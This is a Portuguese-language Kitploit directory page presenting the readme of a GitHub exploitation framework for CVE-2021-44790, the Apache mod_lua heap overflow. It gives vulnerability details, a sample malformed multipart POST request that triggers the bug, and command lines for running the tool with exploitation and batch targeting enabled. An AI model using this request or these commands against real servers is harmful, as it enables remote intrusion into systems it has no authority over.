Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — # Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Framework avançado de exploração com fingerprinting, varredura em múltiplos estágios, arquitetura de plugins, relatórios profissionais, captura de screenshots, banco de dados SQLite e detecção com mais de 95% de confiança. Autor: Sudeepa Wanigarathna. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Scanners de Vulnerabilidades WebFrameworks de ExploraçãoExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Ver Repositório
130há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

# Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Framework avançado de exploração com fingerprinting, varredura em múltiplos estágios, arquitetura de plugins, relatórios profissionais, captura de screenshots, banco de dados SQLite e detecção com mais de 95% de confiança. Autor: Sudeepa Wanigarathna.

Compartilhar

🔥 CVE-2021-44790 - Exploração de Buffer Overflow no Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Visão Geral

Exploração de Buffer Overflow no Apache mod_lua é uma plataforma de exploração avançada, de nível empresarial, para CVE-2021-44790 — uma vulnerabilidade crítica de buffer overflow no módulo mod_lua do Apache HTTP Server 2.4.x. Este framework oferece fingerprinting abrangente, descoberta inteligente de scripts, varredura em múltiplas etapas e recursos profissionais de geração de relatórios, com mais de 95% de confiança na detecção.

⚡ Principais Recursos

RecursoDescrição
🔍 Fingerprinting AvançadoDetecção de versão do Apache, mod_lua, SO, arquitetura, WAF, CDN, contêiner e provedor de nuvem
🎯 Descoberta InteligenteMais de 7 técnicas de descoberta, incluindo robots.txt, sitemap, parsing de HTML e extração de JavaScript
💥 Varredura em Múltiplas EtapasConexão → Fingerprint → Descoberta → Verificação → Exploração → Relatórios
🧩 Sistema de Plugins ExtensívelDesenvolvimento fácil de plugins para CVEs futuras
🌐 Motor HTTP InteligentePool de conexões, novas tentativas, suporte a HTTP/2 e limitação de taxa
📊 Relatórios AbrangentesJSON, HTML, Markdown e PDF com painéis interativos
🎨 Interface de Terminal AtraenteBiblioteca Rich com barras de progresso, tabelas e saída codificada por cores
💾 Banco de Dados de PesquisaArmazenamento SQLite com histórico completo de varreduras e suporte a consultas
📸 Captura de ScreenshotsScreenshots automáticos de páginas web para coleta de evidências
🚀 Alto DesempenhoMais de 20 threads simultâneas e mais de 100 pools de conexões

🎯 Detalhes da Vulnerabilidade

AtributoValor
ID do CVECVE-2021-44790
VulnerabilidadeBuffer Overflow (Underflow de Inteiro)
Software AfetadoApache HTTP Server 2.4.0 a 2.4.51
Versão CorrigidaApache HTTP Server 2.4.52 e posteriores
ComponenteMódulo mod_lua
Vetor de AtaqueRede (Remoto)
Pontuação CVSS9.8 (Crítica)
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto
Maturidade do ExploitProva de Conceito Disponível

Descrição Técnica

A vulnerabilidade existe no módulo mod_lua ao processar requisições multipart/form-data. Um underflow de inteiro na função lua_request_parsebody() pode levar a um buffer overflow baseado em heap, potencialmente permitindo execução remota de código.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Capturas de Tela

Interface PrincipalResultados do Fingerprint
Progresso da VarreduraPainel do Relatório HTML

🚀 Início Rápido

Instalação

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Uso Básico

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Uso Detalhado

Opções de Linha de Comando

python3 exploit.py [TARGET] [OPTIONS]
OpçãoDescriçãoExemplo
TARGETURL do alvohttp://target.com
--config FILEArquivo de configuração--config config.yaml
--threads NNúmero de threads--threads 30
--timeout NTempo limite da requisição (segundos)--timeout 15
--proxy URLURL do proxy--proxy http://127.0.0.1:8080
--verboseSaída detalhada--verbose
--scan-onlyVarredura sem exploração--scan-only
--exploitHabilitar exploração--exploit
--all-payloadsUsar todos os payloads--all-payloads
--report FORMATFormato do relatório (json/html/markdown/all)--report all
--output DIRDiretório de saída--output /path/to/reports/
--researchHabilitar modo de pesquisa--research
--database FILECaminho do banco de dados--database luastorm.db
--screenshotCapturar screenshots--screenshot
--batch FILEArquivo em lote com alvos--batch targets.txt
--query SQLExecutar consulta no banco de dados--query "SELECT * FROM targets"

Exemplos

1. Avaliação Básica de Vulnerabilidade

python3 exploit.py https://example.com --verbose --report all

2. Varredura em Ambiente Corporativo

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Teste de Penetração Completo

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Varredura em Lote

python3 exploit.py --batch targets.txt --config config.yaml

5. Consultas ao Banco de Dados

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Configuração

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
Baixar ferramenta